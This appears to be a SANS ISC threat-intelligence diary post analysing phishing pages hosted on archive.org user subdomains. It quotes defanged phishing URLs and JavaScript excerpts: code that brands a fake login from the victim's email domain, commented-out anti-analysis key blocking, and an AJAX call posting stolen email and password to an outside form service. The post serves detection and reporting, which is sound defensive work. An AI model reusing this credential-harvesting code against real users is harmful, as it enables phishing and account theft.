Phishing pages hosted on archive.org

    Published: 2024-02-21
    Last Updated: 2024-02-21 07:27:43 UTC
    by Jan Kopriva (Version: 1)
    0 comment(s)

    The Internet Archive is a well-known and much-admired institution, devoted to creating a “digital library of Internet sites and other cultural artifacts in digital form”[1]. On its “WayBackMachine” website, which is hosted on https://archive.org/, one can view archived historical web pages from as far back as 1996. The Internet Archive basically functions as a memory for the web, and currently holds over 800 billion web pages as well as millions of books, audio and video recordings and other content… Unfortunately, since it allows for uploading of files by users, it is also used by threat actors to host malicious content from time to time[2,3].

    Over the last few weeks, I came across two different phishing messages, which linked to archive.org.

    URLs from both messages had similar structure, since they both pointed to directories created for individual Internet Archive users, and both passed the e-mail address of the recipient to the phishing page in the same manner – as an anchor hash attribute:

    hxxps[:]//ia601306.us.archive[.]org/12/items/inc_20240130/inc.shtml#[name]@[domain]
    hxxps[:]//ia800207.us.archive[.]org/7/items/ries_20240215/ries.shtml#[name]@[domain]

    While the link from the first message was already dead when I got to it, the second one lead to a still active phishing page (this single SHTML page was the only content uploaded by the corresponding user account), which displayed a fake login window above an image of the legitimate website associated with the domain extracted from the e-mail of the recipient.

    In the following image, you may see how it looked when “abc@isc.sans.edu” e-mail address was provided.

    It is worth mentioning that the page used the same approach to load the logo and image of the legitimate website as a phishing page discovered by Johannes back in 2022[4], i.e., the logo was loaded using a call to clearbit.com, and the image of the website itself using a call to thum.io, as the following excerpt shows.

    ...
    
    var ind=my_email.indexOf("@");
    var my_slice=my_email.substr((ind+1));
    var c= my_slice.substr(0, my_slice.indexOf('.'));
    var final= c.toLowerCase();
    var finalu= c.toUpperCase();
    var sv = my_slice;
    
    var image = "url('https://image.thum.io/get/width/1200/https://"+sv;"')"
    
    $("#logoimg").attr("src", "https://logo.clearbit.com/"+my_slice);
    
    $("#logoimg").attr("alt", finalu);
    $("#logoname").html(finalu);
    $(".logoname").html(finalu);
    $('#logoname2').html(finalu);
    $('.logoname2').html(finalu);
    
    document.getElementById("bgimg").style.backgroundImage= image;
    
    ...

    This similarity with a historical phishing page turned out not to be too surprising, since even a quick look at the HTML code of the current page showed quite clearly, that it was mostly cobbled together from different pre-existing pieces of code.

    This was done in quite a clumsy manner, for example:

    • some portions of code were included twice without reason,
    • there was an attempt to display a missing image (see the picture above – it was supposed to show a “norton.png” file – probably something along the lines of “this site is safe – it was scanned by an antivirus engine”),
    • the HTML code contained a CloudFlare tracking script (this was certainly included by mistake, since it was quite useless from the standpoint of the phishing author and in any case couldn’t function correctly), and
    • there was a large section of commented-out JavaScript code, including a part which contained the same elementary “anti-analysis” functionality I wrote about back in November[5].
    ...
    
      // prevent ctrl + s
    // $(document).bind('keydown', function(e) {
    // if(e.ctrlKey && (e.which == 83)) {
    // e.preventDefault();
    // return false;
    // }
    // });
    
    // document.addEventListener('contextmenu', event => event.preventDefault());
    
    // document.onkeydown = function(e) {
    // if (e.ctrlKey && 
    // (e.keyCode === 67 || 
    // e.keyCode === 86 || 
    // e.keyCode === 85 || 
    // e.keyCode === 117)) {
    // return false;
    // } else {
    // return true;
    // }
    // };
    // $(document).keypress("u",function(e) {
    // if(e.ctrlKey)
    // {
    // return false;      }
    // else {
    // return true;
    // }});
    
    ...

    In any case, if a victim were to input their credentials and press the (somewhat sub-optimally named) “Submit Query” button, the data would have been sent to a form hosted at submit-form.com – a online service allowing for easy gathering of information through forms without the need to set up any infrastructure.

    ...
    
    $.ajax({
    dataType: 'JSON',
    url: 'hxxps[:]//submit-form[.]com/8dcxPGp2',
    type: 'POST',
            data:{
              email:email,
              pwwwd:pwwwd,
                website: sv,
            },
    
    ...

    Although the two phishing messages and the page mentioned above are hardly examples of the most dangerous or sophisticated threats, they do show quite well that abuse of legitimate services by threat actors is rampant and that vigilance among users of modern internet must be never-ending.

    It is also worth noting, that even though the URLs that the phishing messages contained pointed to archive.org, they didn’t point to the second level domain itself, but to fourth level subdomains related to user-assigned data… And since a quick test seems to indicate that the WayBackMachine itself only uses domains archive.org, web-static.archive.org and web.archive.org to provide the historical view of the internet, if one wanted to, one could easily detect/hunt for/block attempted access to any potentially malicious content that might be uploaded to the Internet Archive service by arbitrary users (i.e., in the same way as the phishing page discussed above was) by simply looking for fourth-level subdomains on archive.org (or for any archive.org sub-domain besides the three mentioned above)…

    It should also be mentioned that although I have flagged the Internet Archive hosted file as being used for phishing through an archive.org reporting mechanism, and also reported the use of the specific Submit Form form for malicious activities several days ago, both are unfortunately still up at the time of writing…

    [1] https://archive.org/about/
    [2] https://blog.rootshell.be/2017/04/20/archive-org-abused-deliver-phishing-pages/
    [3] https://isc.sans.edu/diary/Malicious+Content+Delivered+Through+archiveorg/27688
    [4] https://isc.sans.edu/diary/web3+phishing+via+selfcustomizing+landing+pages/28312
    [5] https://isc.sans.edu/diary/Phishing+page+with+trivial+antianalysis+features/30412

    -----------
    Jan Kopriva
    @jk0pr
    Nettles Consulting

    0 comment(s)
    ISC Stormcast For Wednesday, February 21st, 2024 https://isc.sans.edu/podcastdetail/8864
    ISC Stormcast For Wednesday, February 21st, 2024 https://isc.sans.edu/podcastdetail/8862

      Comments


      Diary Archives